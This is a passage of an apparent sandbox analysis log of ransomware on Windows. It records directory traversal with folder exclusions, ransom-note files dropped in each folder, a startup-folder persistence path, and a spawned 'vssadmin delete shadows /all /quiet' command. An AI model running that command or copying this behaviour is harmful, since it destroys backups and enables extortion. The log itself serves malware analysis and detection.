(lpFileName="\\\\?\\C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.475] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0083.475] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0083.475] RmStartSession () returned 0x0 [0083.478] RmRegisterResources () returned 0x0 [0083.482] RmGetList () returned 0x0 [0083.594] RmEndSession () returned 0x0 [0083.660] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0083.660] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0083.660] FindClose (in: hFindFile=0x6063e0 | out: hFindFile=0x6063e0) returned 1 [0083.660] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0083.660] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\ja-jp\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0083.662] WriteFile (in: hFile=0x344, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0083.663] CloseHandle (hObject=0x344) returned 1 [0083.664] GetProcessHeap () returned 0x5e0000 [0083.664] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0083.664] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0083.664] lstrcmpiW (lpString1="ko-KR", lpString2="Windows") returned -1 [0083.664] lstrcmpiW (lpString1="ko-KR", lpString2="$Recycle.bin") returned 1 [0083.664] lstrcmpiW (lpString1="ko-KR", lpString2="System Volume Information") returned -1 [0083.664] lstrcmpiW (lpString1="ko-KR", lpString2="Program Files") returned -1 [0083.664] lstrcmpiW (lpString1="ko-KR", lpString2="Program Files (x86)") returned -1 [0083.664] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0083.664] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0083.664] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0083.664] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ko-KR", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0083.664] GetProcessHeap () returned 0x5e0000 [0083.664] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x636b18 [0083.664] wnsprintfW (in: pszDest=0x636b18, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0083.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6062e0 [0083.665] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.665] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.665] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.665] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.665] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.665] wnsprintfW (in: pszDest=0x636b18, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0083.665] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.665] FindNextFileW (in: hFindFile=0x6062e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0083.665] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.665] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.665] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.665] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.665] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.665] wnsprintfW (in: pszDest=0x636b18, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0083.665] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.665] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.665] FindNextFileW (in: hFindFile=0x6062e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0083.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0083.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0083.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0083.665] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0083.665] wnsprintfW (in: pszDest=0x636b18, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0083.665] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0083.665] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0083.665] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0083.666] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0083.666] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.666] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0083.666] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0083.666] RmStartSession () returned 0x0 [0083.668] RmRegisterResources () returned 0x0 [0083.672] RmGetList () returned 0x0 [0083.803] RmEndSession () returned 0x0 [0083.857] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0083.857] FindNextFileW (in: hFindFile=0x6062e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.857] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0083.857] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0083.857] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0083.857] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0083.857] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0083.857] wnsprintfW (in: pszDest=0x636b18, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui") returned 33 [0083.857] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0083.857] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0083.857] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0083.857] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0083.857] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.857] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0083.857] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0083.857] RmStartSession () returned 0x0 [0083.859] RmRegisterResources () returned 0x0 [0083.864] RmGetList () returned 0x0 [0083.961] RmEndSession () Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x49d1f000" os_pid = "0x5f0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xcac" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000fac7" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 10 os_tid = 0x68c Thread: id = 11 os_tid = 0xa2c Thread: id = 12 os_tid = 0xa14 Thread: id = 13 os_tid = 0x8dc Thread: id = 14 os_tid = 0x8d4 Thread: id = 15 os_tid = 0x520 Thread: id = 16 os_tid = 0x67c Thread: id = 17 os_tid = 0x678 Thread: id = 18 os_tid = 0x644 Thread: id = 19 os_tid = 0x640 Thread: id = 20 os_tid = 0x63c Thread: id = 21 os_tid = 0x5f4 Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0xced1000" os_pid = "0x2ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcac" cmd_line = "\"C:\\WINDOWS\\sysnative\\vssadmin.exe\" delete shadows /all /quiet" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 22 os_tid = 0xdb0 Thread: id = 28 os_tid = 0xf88 Thread: id = 30 os_tid = 0xb98 Thread: id = 31 os_tid = 0xeb0 Thread: id = 32 os_tid = 0x48c Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x646c0000" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x2ac" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0xbec Thread: id = 24 os_tid = 0xf94 Thread: id = 25 os_tid = 0xd08 Thread: id = 26 os_tid = 0xf08 Thread: id = 27 os_tid = 0xfa8